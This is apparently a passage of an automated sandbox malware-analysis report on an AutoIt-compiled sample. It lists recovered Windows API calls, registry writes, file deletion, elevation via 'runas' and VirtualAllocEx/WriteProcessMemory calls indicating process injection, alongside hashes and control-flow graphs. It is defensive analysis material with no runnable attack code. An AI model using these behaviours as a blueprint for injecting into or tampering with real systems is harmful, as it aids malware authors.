• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 3a5ebfb0166e52ebb278c362da4e1a45453a9654096a4f157859f985a06aca82
• Instruction ID: b7c8601e5684cb8fb0d0c5ed089577d9fd5316936716e227f556ca95cfe63a8f
• Opcode Fuzzy Hash: 3a5ebfb0166e52ebb278c362da4e1a45453a9654096a4f157859f985a06aca82
• Instruction Fuzzy Hash: 1D31D23260074EAADB149BA4DC49EEE73BCFF05368F104159E915E7190EB75DA888A12

Control-flow Graph
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,008532EF,?), ref: 00853342
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,008532EF,?), ref: 00853355
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00922418,00922400,?,?,?,?,?,?,008532EF,?), ref: 008533C1
  • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
  • Part of subcall function 008541E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008533E9,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00854227
• SetCurrentDirectoryW.KERNELBASE(?,00000001,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00853442
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00893C8A
• SetCurrentDirectoryW.KERNEL32(?,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00893CCB
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009131F4,00922418,?,?,?,?,?,?,?,008532EF), ref: 00893D54
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00893D5B
  • Part of subcall function 0085345A: GetSysColorBrush.USER32(0000000F), ref: 00853465
  • Part of subcall function 0085345A: LoadCursorW.USER32(00000000,00007F00), ref: 00853474
  • Part of subcall function 0085345A: LoadIconW.USER32(00000063), ref: 0085348A
  • Part of subcall function 0085345A: LoadIconW.USER32(000000A4), ref: 0085349C
  • Part of subcall function 0085345A: LoadIconW.USER32(000000A2), ref: 008534AE
  • Part of subcall function 0085345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008534C6
  • Part of subcall function 0085345A: RegisterClassExW.USER32(?), ref: 00853517
  • Part of subcall function 0085353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00853568
  • Part of subcall function 0085353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00853589
  • Part of subcall function 0085353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,008532EF,?), ref: 0085359D
  • Part of subcall function 0085353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,008532EF,?), ref: 008535A6
  • Part of subcall function 008538F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008539C3
                                                                                                                                                                            Strings
                                                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00893C84
                                                                                                                                                                            • runas, xrefs: 00893D4F
                                                                                                                                                                            • AutoIt, xrefs: 00893C7F
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 683915450-2030392706

APIs
  • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
  • Part of subcall function 008BE9C5: GetFileAttributesW.KERNELBASE(?,008BD755), ref: 008BE9C6
• FindFirstFileW.KERNELBASE(?,?), ref: 008BD8E2
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 008BD99D
• MoveFileW.KERNEL32(?,?), ref: 008BD9B0
• DeleteFileW.KERNEL32(?,?,?,?), ref: 008BD9CD
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 008BD9F7
  • Part of subcall function 008BDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,008BD9DC,?,?), ref: 008BDA72
• FindClose.KERNEL32(00000000,?,?,?), ref: 008BDA13
• FindClose.KERNEL32(00000000), ref: 008BDA24
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
APIs
  • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
  • Part of subcall function 008BE9C5: GetFileAttributesW.KERNELBASE(?,008BD755), ref: 008BE9C6
• FindFirstFileW.KERNELBASE(?,?), ref: 008BDBE0
• DeleteFileW.KERNELBASE(?,?,?,?), ref: 008BDC30
• FindNextFileW.KERNEL32(00000000,00000010), ref: 008BDC41
• FindClose.KERNEL32(00000000), ref: 008BDC58
• FindClose.KERNEL32(00000000), ref: 008BDC61
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 008BDCC1
• Process32FirstW.KERNEL32(00000000,?), ref: 008BDCCF
• Process32NextW.KERNEL32(00000000,?), ref: 008BDCEF
• CloseHandle.KERNELBASE(00000000), ref: 008BDD9C
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
APIs
• lstrlenW.KERNEL32(?,00894686), ref: 008BE397
• GetFileAttributesW.KERNELBASE(?), ref: 008BE3A6
• FindFirstFileW.KERNELBASE(?,?), ref: 008BE3B7
• FindClose.KERNELBASE(00000000), ref: 008BE3C3
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
                                                                                                                                                                            • Opcode ID: f4e6466004a85a9e6da26de091fa82b99ef77501c436c3a87ce8a4c6b33a114d
                                                                                                                                                                            • Instruction ID: 12101d9473541db97bfb34534c0e558dc25086d1af20d214f8feb4d1d5a098d8
                                                                                                                                                                            • Opcode Fuzzy Hash: f4e6466004a85a9e6da26de091fa82b99ef77501c436c3a87ce8a4c6b33a114d
                                                                                                                                                                            • Instruction Fuzzy Hash: 90F0A030411A106B82216738AC8D8EA77EDFE46335B104711F975C63F0D7B0AD994695
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0087504E,?,009198D8,0000000C,008751A5,?,00000002,00000000), ref: 00875099
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0087504E,?,009198D8,0000000C,008751A5,?,00000002,00000000), ref: 008750A0
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 008750B2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                            • Opcode ID: 9dd0a2b45228dd19a387302230f5504e36d65d6d2e2e3e8cdde67c3e78922238
                                                                                                                                                                            • Instruction ID: 1cfc1a5e49d1917f74064bd5882a3b9ab1bef071f687a9c5feca47fc58b2f23f
                                                                                                                                                                            • Opcode Fuzzy Hash: 9dd0a2b45228dd19a387302230f5504e36d65d6d2e2e3e8cdde67c3e78922238
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE0B631400A88AFCF216F58DD49E587B69FB41781F008014F8198B226DB76ED46DB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 008AE60A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                            • String ID: X64
                                                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                                                            • Opcode ID: d39e609c06db27ac3b8a7ac9f662b7cde461cb921d5052d89b18390d1195a948
                                                                                                                                                                            • Instruction ID: 647b0bb1ecc4d897b4fe25643916dc0657eb8e33354d5f2219d7fec9c6bbb6e8
                                                                                                                                                                            • Opcode Fuzzy Hash: d39e609c06db27ac3b8a7ac9f662b7cde461cb921d5052d89b18390d1195a948
                                                                                                                                                                            • Instruction Fuzzy Hash: 56D0C9B480511DEACB90CBA0DCC8DDD737CFB24308F104551F506E6040DB3095488B10
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0118CEB2), ref: 01194EC1
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01194F0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 01142000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1602090695.0000000001142000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                                                            • Opcode ID: 9187ae66f07eb2af1aaaf2bbbdfa9cb70fb798fa5172516f72a78c4b3b61434a
                                                                                                                                                                            • Instruction ID: 9b4d4f035cb201f6a19bd0ab2b7af7543f54026ee48b5f138524d0a1f9983f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 9187ae66f07eb2af1aaaf2bbbdfa9cb70fb798fa5172516f72a78c4b3b61434a
                                                                                                                                                                            • Instruction Fuzzy Hash: 87F062B13802017FEB4E7BF08C06FB97B66BF55708F1400AEE6606E4E1DB666520D751
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0118CEB2), ref: 01194EC1
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01194F0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 010FC000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1602038320.00000000010FC000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                                                            • Opcode ID: 9187ae66f07eb2af1aaaf2bbbdfa9cb70fb798fa5172516f72a78c4b3b61434a
                                                                                                                                                                            • Instruction ID: 9b4d4f035cb201f6a19bd0ab2b7af7543f54026ee48b5f138524d0a1f9983f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 9187ae66f07eb2af1aaaf2bbbdfa9cb70fb798fa5172516f72a78c4b3b61434a
                                                                                                                                                                            • Instruction Fuzzy Hash: 87F062B13802017FEB4E7BF08C06FB97B66BF55708F1400AEE6606E4E1DB666520D751
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0118CEB2), ref: 01194EC1
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01194F0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118B000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                                                            • Opcode ID: 5e79e9bfc78ee257bd3eb1cf3debc7ce1774875b02c80ed6b53c13afc4def554
                                                                                                                                                                            • Instruction ID: 9b4d4f035cb201f6a19bd0ab2b7af7543f54026ee48b5f138524d0a1f9983f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e79e9bfc78ee257bd3eb1cf3debc7ce1774875b02c80ed6b53c13afc4def554
                                                                                                                                                                            • Instruction Fuzzy Hash: 87F062B13802017FEB4E7BF08C06FB97B66BF55708F1400AEE6606E4E1DB666520D751
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0118CEB2), ref: 01194EC1
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01194F0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118A000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                                                            • Opcode ID: 5e79e9bfc78ee257bd3eb1cf3debc7ce1774875b02c80ed6b53c13afc4def554
                                                                                                                                                                            • Instruction ID: 9b4d4f035cb201f6a19bd0ab2b7af7543f54026ee48b5f138524d0a1f9983f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e79e9bfc78ee257bd3eb1cf3debc7ce1774875b02c80ed6b53c13afc4def554
                                                                                                                                                                            • Instruction Fuzzy Hash: 87F062B13802017FEB4E7BF08C06FB97B66BF55708F1400AEE6606E4E1DB666520D751

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 8dcd16-8dcd5a call 85bf07 * 3 7 8dcd5c-8dcd5f 0->7 8 8dcd65-8dcdd8 call 858e70 call 8dd6b1 call 8dd2f7 0->8 7->8 9 8dce64-8dce71 call 85e650 7->9 21 8dce08-8dce0d 8->21 22 8dcdda-8dcde8 8->22 16 8dd1ef-8dd212 call 85bd2c * 3 9->16 25 8dce7c 21->25 26 8dce0f-8dce24 RegConnectRegistryW 21->26 27 8dcded-8dcdfd 22->27 28 8dcdea 22->28 34 8dce80-8dceab RegCreateKeyExW 25->34 30 8dce76-8dce7a 26->30 31 8dce26-8dce43 call 857ab0 26->31 32 8dcdff 27->32 33 8dce02-8dce06 27->33 28->27 30->34 45 8dce48-8dce58 31->45 46 8dce45 31->46 32->33 35 8dce61-8dce63 33->35 36 8dcead-8dceca call 857ab0 34->36 37 8dcf0e-8dcf13 34->37 35->9 49 8dcecc 36->49 50 8dcecf-8dcede 36->50 42 8dcf19-8dcf42 call 858e70 call 874db8 37->42 43 8dd1d6-8dd1e7 RegCloseKey 37->43 59 8dcf44-8dcf91 call 858e70 call 874cf3 call 858e70 * 2 42->59 60 8dcf96-8dcfb9 call 858e70 call 874db8 42->60 43->16 47 8dd1e9-8dd1ed RegCloseKey 43->47 51 8dce5d 45->51 52 8dce5a 45->52 46->45 47->16 49->50 54 8dcee0 50->54 55 8dcee3-8dcef9 call 85e650 50->55 51->35 52->51 54->55 55->16 63 8dceff-8dcf09 RegCloseKey 55->63 85 8dd2bb-8dd2c7 RegSetValueExW 59->85 72 8dcfbf-8dd019 call 858e70 call 874cf3 call 858e70 * 2 RegSetValueExW 60->72 73 8dd047-8dd06a call 858e70 call 874db8 60->73 63->16 72->43 103 8dd01f-8dd042 call 857ab0 call 85e650 72->103 86 8dd156-8dd179 call 858e70 call 874db8 73->86 87 8dd070-8dd0d6 call 858e70 call 87019b call 858e70 call 85605e 73->87 85->43 89 8dd2cd-8dd2f2 call 857ab0 call 85e650 85->89 108 8dd17f-8dd19f call 85c92d call 858e70 86->108 109 8dd215-8dd238 call 858e70 call 874db8 86->109 124 8dd0d8-8dd0dd 87->124 125 8dd0f6-8dd128 call 858e70 RegSetValueExW 87->125 89->43 103->43 127 8dd1a1-8dd1b4 RegSetValueExW 108->127 128 8dd23a-8dd260 call 85c5df call 858e70 109->128 129 8dd265-8dd282 call 858e70 call 
874db8 109->129 130 8dd0df-8dd0e1 124->130 131 8dd0e5-8dd0e8 124->131 137 8dd14a-8dd151 call 8701a4 125->137 138 8dd12a-8dd143 call 857ab0 call 85e650 125->138 127->43 133 8dd1b6-8dd1c0 call 857ab0 127->133 128->127 145 8dd1c5-8dd1cf call 85e650 129->145 153 8dd288-8dd2b9 call 8c276a call 858e70 call 8c27da 129->153 130->131 131->124 135 8dd0ea-8dd0ec 131->135 133->145 135->125 141 8dd0ee-8dd0f2 135->141 137->43 138->137 141->125 145->43 153->85
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DCE1C
                                                                                                                                                                            • RegCreateKeyExW.KERNELBASE(?,?,00000000,008EDCD0,00000000,?,00000000,?,?), ref: 008DCEA3
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 008DCF03
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008DCF53
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008DCFCE
                                                                                                                                                                            • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 008DD011
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 008DD120
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 008DD1AC
• RegCloseKey.KERNELBASE(?), ref: 008DD1E0
• RegCloseKey.ADVAPI32(00000000), ref: 008DD1ED
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 008DD2BF
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: 1b83824601efea490a38c0404fdede851b6756ee46f17d9519320116104e78f0
• Instruction ID: 83d51d03db20bd43efbe1229f4bb6b93e2960f69e3a084c39712153a209af471
• Opcode Fuzzy Hash: 1b83824601efea490a38c0404fdede851b6756ee46f17d9519320116104e78f0
• Instruction Fuzzy Hash: 6A1237752046019FDB15DF18C881A2AB7E5FF88714F14855EF89ADB3A2CB31ED49CB82

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID:
• String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 0-1645009161
• Opcode ID: 409673c57743f1a04adb2e29c26a9f39bdc2efecbb68333e2a06c2ce89c10b45
• Instruction ID: f8308577832e8e7f3685fba802c0bc362cc1d7bfc1c9ea01281acc7b90a33ff6
• Opcode Fuzzy Hash: 409673c57743f1a04adb2e29c26a9f39bdc2efecbb68333e2a06c2ce89c10b45
• Instruction Fuzzy Hash: BB81C271A40209BBDB11AF68DC43FAA3BA8FF15741F044024FD09EA186EB74DA59C762
APIs
• GetInputState.USER32 ref: 0085EEB7
• timeGetTime.WINMM ref: 0085F0B7
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085F1D8
• TranslateMessage.USER32(?), ref: 0085F22B
• DispatchMessageW.USER32(?), ref: 0085F239
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085F24F
• Sleep.KERNELBASE(0000000A), ref: 0085F261
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: de901c7bdb2b3ea32657ab0e5c0a8991294484d9479d7ae9e36b76dcf5dda1e6
• Instruction ID: c48531ac75762be7fb46c72853a4411c9d9e0b591eb47c4e95542bb07905a079
• Opcode Fuzzy Hash: de901c7bdb2b3ea32657ab0e5c0a8991294484d9479d7ae9e36b76dcf5dda1e6
• Instruction Fuzzy Hash: 6832E070608741EFEB28CF24C844BAAB7E4FF82305F544529FA55CB292D771E948CB92

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 008535DE
• RegisterClassExW.USER32(00000030), ref: 00853608
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00853619
• InitCommonControlsEx.COMCTL32(?), ref: 00853636
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00853646
• LoadIconW.USER32(000000A9), ref: 0085365C
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0085366B
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
